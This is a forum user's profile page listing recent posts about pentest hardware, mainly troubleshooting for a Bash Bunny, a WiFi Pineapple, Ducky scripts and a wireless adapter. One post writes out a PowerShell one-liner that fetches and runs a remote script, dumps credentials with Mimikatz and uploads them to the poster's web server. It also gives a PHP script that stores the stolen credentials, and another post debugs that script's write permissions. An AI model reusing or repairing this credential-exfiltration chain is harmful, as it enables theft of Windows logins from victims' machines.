Jump to content


Active Members
  • Posts

  • Joined

  • Last visited

Profile Information

  • Gender

Recent Profile Visitors

2,488 profile views

TeCHemically's Achievements


Newbie (1/14)

  1. Great advice, thanks for your response! I took your advice and here is what I got: 2017-11-20_19-46-03.creds is not writable.#file_put_contents($file, file_get_contents("php://input")); So, it looks like the file does not have write permissions. I thought I had the permissions set appropriately; but clearly I wasn't right. The file has write permissions for www-data (file is owned by www-data). What setting do I need to set so that this file has permissions to write to the server? Sorry for the nooby question. Thanks again for your help in identifying the issue!
  2. I have a question about this; I have always used tcpdump for this attack because the PHP file never gathers the incoming credentials. Can someone tell me what I am doing wrong? I am using the same command like above: powershell "IEX (New-Object Net.WebClient).DownloadString('MyWebServer/My.ps1'); $output = Invoke-Mimikatz -DumpCreds; (New-Object Net.WebClient).UploadString('MyWebServer/My.php', $output)" Here is the PHP script: <?php $file = $_SERVER['REMOTE_ADDR'] . "_" . date("Y-m-d_H-i-s") . ".creds"; file_put_contents($file, file_get_contents("php://input")); ?> it was broken up like this before; but didn't see,m to have any affect (i know almost nothing of PHP; so this probably makes no difference): <?php $file = $_SERVER['REMOTE_ADDR'] . "_" . date("Y-m-d_H-i-s") . ".creds"; file_put_contents($file, file_get_contents("php://input")); ?> Thanks to any who reply!
  3. Windows 10 has patched lsass now which effectively breaks mimikatz functionality.
  4. So, the ducknunter on nethunter uses 2 different elements to inject strings. One being STRING, like normal, and the other being TEXT. When you use STRING, the LF at the end of your line is interpreted as an ENTER keystroke. If you just want to enter a string then you need to use the TEXT element instead. I can see how this could make your scripts more efficient; but unless you know about this it just drives you crazy. Hope this helps someone!
  5. I am unable to use scripts that open CMD as admin because phantom ENTER lines are bring executed after my "STRING cmd" lines in my ducky scripts. This is also happening other places. I have a workaround to get an admin prompt; but it is of no use because these ENTER keystrokes are bring entered in places where they should not be; and since they aren't actually in the script I cannot remove them. It may be that the end of line EOL character (LF in this case) is being interpreted as an ENTER keystroke. Is there anyway to convert all EOL characters in a file from LF or CRLF to some kind of NULL character so the Duckhunter HID conversion tool won't add in these ENTER keystrokes? Thanks to all who reply. This has been driving me nuts!
  6. I have not had any success with my bash bunny since I bought it on the day it launched. Install tools has never worked, no matter what workarounds have been posted to try. The payloads dont execute properly with the exception of a couple ducky payloads that executed a few times with issues. Now even the ducky script payloads fail to respond. I get no lights at all when trying to run the install tools payload. I would like to speak with someone about a replacement. This device has never worked and it does not behave at all like the readme files state it should. I fought with it so long that I just set it down for a few months and picked it back up again today. Still its a whirlwind of fail. Please help me out here. I was so excited about this platform that I bought it on day one. I believe there is just some issue with the specific device I received. Any help and guidance is greatly appreciated!
  7. I got airodump results on a different laptop. Do you know if the cards in the hakshop are NEH or NHA? If this wont work on my main rig then I'm going to have to return it. Shame too. It was a great price. I hope Darren isn't carrying the crap shoot card that contains inconsistent chipsets.
  8. I just got the RT3070 usb adapter and airodump isn't working on any OS. Tried 3 systems so far and every one of them shows all blank once the card is in mon mode and I start airodump. I ran check kill so nothing is interfering with it. What's the deal with this card? Any help is appreciated.
  9. I have to agree that the vast majority of the time I have spent with my pineapples has been in troubleshooting, factory resetting, re-flashing, etc. The tool has great promise; but has never been stable for me in any true long term or feasible "deployment" sense. It has been fun to play with, while I'm not screaming at it for bugs I am fighting with; but I have never gotten any iteration to function in a consistent and stable way...and my first pineapple was a fon I built myself. So, I'm not talking about a passing fancy here. I've been involved with these things all the way up to the Mark V. Given my issues, and the fact that support for older models drops off very quickly, I just cant justify purchasing either of the newer models. Sad :(
  10. Following the DIP switch reset procedure so that should be good; but why am I getting permission denied with SCP and SSH? This has been the case across multiple factory resets.
  11. Found this; so I am factory resetting now. Hopefully this solves the issue. If anyone knows what is going on please do reply.: You can use the DIP switches to perform a factory reset but it sounds like you may be using the wrong switches or not using the correct procedure. Try this: NOTE: With the switches facing you, they are ordered 1 - 5 from left to right. 1) Power off your Pineapple. 2) Place your DIP switches in the following sequence: Switch 1 - UP Switch 2 - DOWN Switch 3 - DOWN Switch 4 - UP Switch 5 - UP 3) Power on your Pineapple 4) Wait 5 minutes just to be safe and power off again 5) Place all of your switches back in the up position again and power on. You should be good to go. Just connect via ethernet or Wifi, login to the web interface, and create a new password.
  12. I am unable to SCP or SSH to the mark V. Getting "permission denied" error for both. This has been constant prior to today; however, today when minimizing infusions they will no longer maximize again and I cannot factory reset or even properly reboot the device. So I need to be able to reflash it over SSH. Any ideas? Am I overlooking something here? Using port 22 for both.
  13. I have minimized several infusions and now they will not come back to the interface. Configuration is one of them so I cannot factory reset the pineapple. Trying to SSH in fails with permission denied. Is there a fix for this issue? How can i restore the infusions so they are accessible?
  14. Mode G appeared successful; but I was never able to get connected via sceen to verify the bunny could get out. I am on an ubuntu based distro. I tried ECM and RNDIS. RNDIS listed as ttyACM0 for a time; but now it wont list as a tty at all whether ECM or RNDIS. Even after reboots. It just seems absent for some reason; although it shows the eth1 in ifconfig
  • Create New...